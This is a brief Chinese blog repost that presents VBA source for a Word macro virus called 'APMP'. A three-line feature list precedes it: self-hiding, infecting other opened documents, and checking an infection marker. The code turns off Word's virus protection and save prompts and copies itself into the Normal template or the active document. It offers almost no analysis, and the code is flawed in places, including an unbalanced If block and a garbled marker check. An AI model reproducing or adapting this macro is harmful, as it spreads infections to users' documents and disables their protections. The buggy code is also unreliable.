APMP宏

1) 宏病毒代码自我隐藏
2) 感染其他打开的word文档
3) 检查感染标志“APMP”

'APMP
'KILL
Private Sub DocumentOpen()
On Error Resume Next
Application.DisplayStatusBar = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Host
If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, MyCode
If ThisDocument = NormalTemplate Then _
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End With
End Sub

同事提供的注释

转载于:https://blog.51cto.com/antivirusjo/2047554